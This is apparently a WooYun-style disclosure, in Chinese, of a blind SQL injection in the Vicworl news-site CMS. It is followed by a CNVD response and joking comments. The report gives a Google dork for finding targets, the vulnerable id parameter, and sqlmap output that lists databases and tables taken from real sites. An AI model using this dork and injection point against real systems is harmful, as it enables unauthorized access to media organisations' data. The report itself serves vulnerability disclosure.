某新闻媒体系统通用型注入（威胁各大电视台）

谷歌关键字：Powered by Vicworl home

【好吧，你们被墙了，我在纠结你们到时候怎么测试】

http://**.**.**.**/home.php?id=10

http://**.**.**.**/home.php?id=1

拿了这两个网站测试了一下。只能盲注，所以太费时了··

[15:01:46] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.8

back-end DBMS: MySQL 5.0.11

[15:01:46] [INFO] fetching database names

[15:01:46] [INFO] fetching number of databases

[15:01:46] [INFO] retrieved:

[15:01:46] [WARNING] it is very important not to stress the network adapte

ndwidth during usage of time-based queries

[15:02:11] [ERROR] invalid character detected. retrying..

[15:02:11] [WARNING] increasing time delay to 6 seconds

5

[15:02:39] [INFO] retrieved: infor

[15:08:18] [ERROR] invalid character detected. retrying..

[15:08:18] [WARNING] increasing time delay to 7 seconds

mat

[15:12:03] [ERROR] invalid character detected. retrying..

[15:12:03] [WARNING] increasing time delay to 8 seconds

i

[15:14:19] [ERROR] invalid character detected. retrying..

[15:14:19] [WARNING] increasing time delay to 9 seconds

on_sc

[15:22:19] [ERROR] invalid character detected. retrying..

[15:22:19] [WARNING] increasing time delay to 10 seconds

[15:24:05] [ERROR] unable to properly validate last character value ('h').

hema

[15:25:48] [INFO] retrieved: mysql

[15:29:27] [INFO] retrieved: te

[15:31:41] [ERROR] invalid character detected. retrying..

[15:31:41] [WARNING] increasing time delay to 6 seconds

st

[15:33:38] [INFO] retrieved: vicworl

[15:40:09] [INFO] retrieved: wordpress

available databases [5]:

[*] information_schema

[*] mysql

[*] test

[*] vicworl

[*] wordpress

表

+-----------------+

| v_ |

| v_article |

| v_caller |

| v_comment |

| v_favorites |

| v_feedback |

| v_fprgetcode |

| v_friend |

| v_js |

| v_leaveword |

| v_loitype |

| v_message |

| v_photo |

| v_phototype |

| v_playersetting |

| v_setting |

| v_sitestyle |

| v_special |

| v_syslogtype |

| v_tags |

| v_template |

| v_topmedia |

| v_user |

| v_userlevel |

| v_vaborder |

| v_vasge |

| v_weblink |

+-----------------+

不知道是家里网速太差还是网站服务器太渣，跑的太费时了···仅仅是跑了数据库和表就花了我6个小时······

竟然没任何防注入的措施···此套系统好像是要商业出售的，卖几K把····

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2014-07-09 15:36

厂商回复：

CNVD确认并复现所述多个实例情况，转由CNCERT向新闻行业主管单位——新闻办通报，由其后续协调相关单位处置。

最新状态：

暂无

1. 2014-07-04 19:23 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子， 但是除了他华...)

   0

   @梧桐雨 你愿意吗

   1# 回复此人

2. 2014-07-04 19:31 | Hero ( 普通白帽子 | Rank:162 漏洞数:53 | 药药切克闹,充气娃娃迷幻药)

   0

   @梧桐雨 你愿意吗

   2# 回复此人

3. 2014-07-04 20:21 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了，也来挖挖漏洞，为创建安全...)

   0

   @梧桐雨 你愿意吗

   3# 回复此人

4. 2014-07-04 22:11 | 忆苦思甜 ( 实习白帽子 | Rank:65 漏洞数:25 )

   0

   如果能拿下新闻源，黑产利用··过不了多久我就能升级加WB，当上核心白帽子，出任乌云管理员，迎娶梧桐雨，走向人生的巅峰,想想还有点羞射呢···

   4# 回复此人

5. 2014-07-04 22:31 | zhxs ( 实习白帽子 | Rank:69 漏洞数:26 | 不是你不行、只是路不平ฏ๎๎๎๎๎๎๎๎...)

   0

   大牛膜拜一下哈....

   5# 回复此人

6. 2014-07-04 23:04 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)

   0

   迎娶梧桐雨...

   6# 回复此人

7. 2014-07-04 23:07 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

   0

   @梧桐雨

   7# 回复此人

8. 2014-07-05 00:59 | 梧桐雨 ( 核心白帽子 | Rank:1662 漏洞数:191 | 学无止境)

   0

   啊，洞主你这是何苦，天下比我好的多的是。

   8# 回复此人

9. 2014-07-05 11:04 | 李旭敏 ( 普通白帽子 | Rank:840 漏洞数:115 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

   0

   @梧桐雨 我宣你，你造么

   9# 回复此人

10. 2014-07-05 11:05 | Hero ( 普通白帽子 | Rank:162 漏洞数:53 | 药药切克闹,充气娃娃迷幻药)

    0

    @梧桐雨 我宣你，你造么

    10# 回复此人

11. 2014-07-09 18:04 | 乌云 ( 实习白帽子 | Rank:66 漏洞数:14 | a)

    0

    @梧桐雨 他俩宣你，你造么

    11# 回复此人

12. 2014-10-03 19:49 | sutdy ( 普通白帽子 | Rank:113 漏洞数:37 | 0.0)

    0

    @梧桐雨 我宣你，你造么

    12# 回复此人

13. 2014-10-27 11:14 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    0

    @梧桐雨 好人卡。。。。

    13# 回复此人